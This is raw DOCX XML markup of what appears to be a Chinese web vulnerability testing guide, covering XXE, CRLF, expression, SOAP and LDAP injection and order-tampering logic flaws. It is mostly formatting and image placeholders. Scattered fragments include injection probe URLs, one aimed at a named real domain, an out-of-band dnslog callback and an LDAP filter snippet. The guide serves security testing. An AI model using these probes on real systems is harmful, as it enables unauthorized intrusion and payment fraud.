        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>.3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>XML表达式注入漏洞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19050" t="19050" r="19050" b="21590"/>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79"/>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19050" t="19050" r="20320" b="12065"/>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0"/>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19050" t="19050" r="18415" b="20320"/>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5817544" cy="2098192"/>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53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>.3.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>XXE注入漏洞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19050" t="19050" r="16510" b="21590"/>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2"/>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83"/>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4"/>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19050" t="19050" r="16510" b="10160"/>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5"/>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59"/>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59"/>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19050" t="19050" r="18415" b="22225"/>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6"/>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19050" t="19050" r="16510" b="28575"/>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53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>8.3.3 CRLF注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>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53"/>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30"/>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ttp://test.sina.com.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?url=xxx,xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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7"/>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0" b="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8"/>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9"/>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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5780509" cy="2435802"/>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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/orf/xcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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24"/>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1"/>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30"/>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ttp://www.example.com/login?service=${1000-900}</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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ttp://auth.p4p.sogou.com/login?service=${1000-900}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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381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53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">8.3.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>OA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>P注入漏洞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特定业务URL。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19050" t="19050" r="18415" b="1016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3"/>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19050" t="19050" r="16510" b="13335"/>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4"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://123.126.42.32:8089/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>http://xml.66ae2b.dnslog.info/verify</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19050" t="19050" r="16510" b="1905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5"/>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19050" t="19050" r="16510" b="22225"/>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5763882" cy="112274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6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rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>漏洞场景：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>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2540" b="571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7"/>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31"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5781879" cy="1438230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B．</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>权限提升</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="28"/>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65"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        </w:rPr>
        <w:t>document)(security_level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="31"/>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="66"/>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23"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pP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6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571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99"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5346727" cy="2814674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:eastAsia="微软雅黑" w:cs="Times New Roman"/>
          <w:b/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>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6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62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5543550" cy="6000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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5543550" cy="600075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6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62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5753100" cy="2218055"/>
            <wp:effectExtent l="0" t="0" r="0" b="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1"/>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2"/>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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5868658" cy="3492649"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="53"/>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53"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc27676956"/>
      <w:bookmarkStart w:id="85" w:name="_Toc527108567"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>逻辑漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc27676957"/>
      <w:bookmarkStart w:id="87" w:name="_Toc527108568"/>
      <w:r>
        <w:t>9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1 订单篡改提交</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>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0" t="0" r="21590" b="13970"/>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4445" b="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0" t="0" r="1587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635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52"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5254625" cy="2456815"/>
            <wp:effectExtent l="0" t="0" r="317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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266338" cy="2462007"/>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5755640" cy="2275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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="2275840"/>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4935855" cy="2655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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953383" cy="266476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27676958"/>
      <w:bookmarkStart w:id="89" w:name="_Toc527108569"/>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提交订单时抓包重复提交订单。或订单会产生一笔退款单则会导致支付异常。</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381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2540" b="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527108570"/>
      <w:bookmarkStart w:id="91" w:name="_Toc27676959"/>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在订单提交页面抓包发现有过程标识字段data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order][pay]=02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</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3810" b="0"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>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3175" b="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2540" b="0"/>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27676960"/>
      <w:bookmarkStart w:id="93" w:name="_Toc527108571"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://pay.xxx.com/index.php?r=default/pay</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3810" b="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5080" b="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5080" b="0"/>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1905" b="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2540" b="0"/>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3810" b="0"/>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0" b="0"/>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52"/>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52"/>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571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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5307670" cy="1833304"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="52"/>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52"/>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3810" b="825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7620" b="825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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5337486" cy="174765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190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3810" b="0"/>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3175" b="0"/>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4445" b="0"/>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3175" b="0"/>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317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5715" b="0"/>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1905" b="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0"/>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0" b="444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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="30"/>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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5882998" cy="2018521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="52"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5341620" cy="22739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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5363848" cy="2283801"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="52"/>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2540" b="0"/>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39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5294122" cy="14366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53"/>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0" b="571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527108579"/>
      <w:bookmarkStart w:id="109" w:name="_Toc27676968"/>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2540" b="190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3"/>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27676969"/>
      <w:bookmarkStart w:id="111" w:name="_Toc527108580"/>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6350" b="63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4"/>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527108581"/>
      <w:bookmarkStart w:id="113" w:name="_Toc27676970"/>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4445" b="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5"/>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0" b="0"/>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6"/>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www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.example.com:8069</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8"/>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0" b="508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0"/>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0" b="0"/>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0" b="0"/>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0" b="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527108584"/>
      <w:bookmarkStart w:id="120" w:name="_Toc27676974"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其他Web漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc27676975"/>
      <w:bookmarkStart w:id="122" w:name="_Toc52710858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61"/>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23"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="61"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6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2540" b="317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4"/>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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="224091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24"/>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825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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5786534" cy="2203169"/>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24"/>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8255" b="0"/>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7"/>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7620" b="0"/>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8"/>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59"/>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0" b="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0"/>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760915" cy="1020109"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6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6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2"/>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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5756524" cy="2945488"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>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3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4"/>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69"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>仅允许http和https请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，校验返回值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc27676978"/>
      <w:bookmarkStart w:id="128" w:name="_Toc52710858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527108589"/>
      <w:bookmarkStart w:id="130" w:name="_Toc2767697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16"/>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_x0000_s2050" o:spid="_x0000_s2050"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5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AE"/>
    <w:rsid w:val="000023E2"/>
    <w:rsid w:val="00002DAD"/>
    <w:rsid w:val="00003BE2"/>
    <w:rsid w:val="0000478A"/>
    <w:rsid w:val="00005A62"/>
    <w:rsid w:val="0000612A"/>
    <w:rsid w:val="000063D2"/>
    <w:rsid w:val="00006CBD"/>
    <w:rsid w:val="00007138"/>
    <w:rsid w:val="0000723A"/>
    <w:rsid w:val="00007E80"/>
    <w:rsid w:val="00007F66"/>
    <w:rsid w:val="000106B0"/>
    <w:rsid w:val="00011A9A"/>
    <w:rsid w:val="00012B94"/>
    <w:rsid w:val="000138B7"/>
    <w:rsid w:val="00013F78"/>
    <w:rsid w:val="00014E76"/>
    <w:rsid w:val="00015833"/>
    <w:rsid w:val="00015DF6"/>
    <w:rsid w:val="00016E89"/>
    <w:rsid w:val="0001746E"/>
    <w:rsid w:val="0001785E"/>
    <w:rsid w:val="0001789C"/>
    <w:rsid w:val="00017DB0"/>
    <w:rsid w:val="0002043A"/>
    <w:rsid w:val="00020D6F"/>
    <w:rsid w:val="00021743"/>
    <w:rsid w:val="000222AB"/>
    <w:rsid w:val="00022A94"/>
    <w:rsid w:val="00022C03"/>
    <w:rsid w:val="00023845"/>
    <w:rsid w:val="000240EA"/>
    <w:rsid w:val="00024646"/>
    <w:rsid w:val="00024D54"/>
    <w:rsid w:val="000259FA"/>
    <w:rsid w:val="00025A39"/>
    <w:rsid w:val="000261DD"/>
    <w:rsid w:val="0002660D"/>
    <w:rsid w:val="00027253"/>
    <w:rsid w:val="00027C3E"/>
    <w:rsid w:val="000308FF"/>
    <w:rsid w:val="00030ECF"/>
    <w:rsid w:val="000311DF"/>
    <w:rsid w:val="00032782"/>
    <w:rsid w:val="00032A55"/>
    <w:rsid w:val="0003370B"/>
    <w:rsid w:val="00034413"/>
    <w:rsid w:val="000349CD"/>
    <w:rsid w:val="0003598A"/>
    <w:rsid w:val="00035AFE"/>
    <w:rsid w:val="00036C14"/>
    <w:rsid w:val="00036DB4"/>
    <w:rsid w:val="00037340"/>
    <w:rsid w:val="000405E7"/>
    <w:rsid w:val="00040EB4"/>
    <w:rsid w:val="00041155"/>
    <w:rsid w:val="00041A29"/>
    <w:rsid w:val="0004209C"/>
    <w:rsid w:val="00042525"/>
    <w:rsid w:val="00042B95"/>
    <w:rsid w:val="00043EBC"/>
    <w:rsid w:val="00044EB2"/>
    <w:rsid w:val="000457FB"/>
    <w:rsid w:val="00046032"/>
    <w:rsid w:val="0004657A"/>
    <w:rsid w:val="000469FE"/>
    <w:rsid w:val="00047458"/>
    <w:rsid w:val="000475AD"/>
    <w:rsid w:val="000477EE"/>
    <w:rsid w:val="00047D43"/>
    <w:rsid w:val="00050188"/>
    <w:rsid w:val="000503B7"/>
    <w:rsid w:val="00052198"/>
    <w:rsid w:val="00052421"/>
    <w:rsid w:val="000527E8"/>
    <w:rsid w:val="00053022"/>
    <w:rsid w:val="0005302F"/>
    <w:rsid w:val="000530C7"/>
    <w:rsid w:val="00053283"/>
    <w:rsid w:val="0005367B"/>
    <w:rsid w:val="000540B0"/>
    <w:rsid w:val="00054284"/>
    <w:rsid w:val="00054339"/>
    <w:rsid w:val="000546EB"/>
    <w:rsid w:val="0005473B"/>
    <w:rsid w:val="000549A2"/>
    <w:rsid w:val="00054F73"/>
    <w:rsid w:val="00055396"/>
    <w:rsid w:val="00055C2B"/>
    <w:rsid w:val="00055F2B"/>
    <w:rsid w:val="00056424"/>
    <w:rsid w:val="000564D1"/>
    <w:rsid w:val="00056645"/>
    <w:rsid w:val="00057306"/>
    <w:rsid w:val="00057AF1"/>
    <w:rsid w:val="00057BAE"/>
    <w:rsid w:val="00057D71"/>
    <w:rsid w:val="00060FA3"/>
    <w:rsid w:val="0006111A"/>
    <w:rsid w:val="00061701"/>
    <w:rsid w:val="00062331"/>
    <w:rsid w:val="0006280B"/>
    <w:rsid w:val="0006303F"/>
    <w:rsid w:val="00063077"/>
    <w:rsid w:val="00063777"/>
    <w:rsid w:val="0006456D"/>
    <w:rsid w:val="00064F08"/>
    <w:rsid w:val="0006502C"/>
    <w:rsid w:val="00065183"/>
    <w:rsid w:val="000653E8"/>
    <w:rsid w:val="00065BC0"/>
    <w:rsid w:val="00066D57"/>
    <w:rsid w:val="00066E22"/>
    <w:rsid w:val="00066E98"/>
    <w:rsid w:val="0006769C"/>
    <w:rsid w:val="000700F3"/>
    <w:rsid w:val="00071F54"/>
    <w:rsid w:val="00072779"/>
    <w:rsid w:val="00073326"/>
    <w:rsid w:val="00074C2E"/>
    <w:rsid w:val="000770AF"/>
    <w:rsid w:val="00077539"/>
    <w:rsid w:val="00077D82"/>
    <w:rsid w:val="000804CE"/>
    <w:rsid w:val="00080835"/>
    <w:rsid w:val="00081AD7"/>
    <w:rsid w:val="00081CB5"/>
    <w:rsid w:val="00081FCE"/>
    <w:rsid w:val="00083D22"/>
    <w:rsid w:val="00085560"/>
    <w:rsid w:val="000861D1"/>
    <w:rsid w:val="00086343"/>
    <w:rsid w:val="0008739C"/>
    <w:rsid w:val="00087916"/>
    <w:rsid w:val="000879BF"/>
    <w:rsid w:val="00087A6B"/>
    <w:rsid w:val="00091799"/>
    <w:rsid w:val="00092890"/>
    <w:rsid w:val="00094813"/>
    <w:rsid w:val="00094CF2"/>
    <w:rsid w:val="00094E2E"/>
    <w:rsid w:val="00095DD2"/>
    <w:rsid w:val="00095E8E"/>
    <w:rsid w:val="00096004"/>
    <w:rsid w:val="000A0464"/>
    <w:rsid w:val="000A05F6"/>
    <w:rsid w:val="000A0A9B"/>
    <w:rsid w:val="000A10B5"/>
    <w:rsid w:val="000A16C4"/>
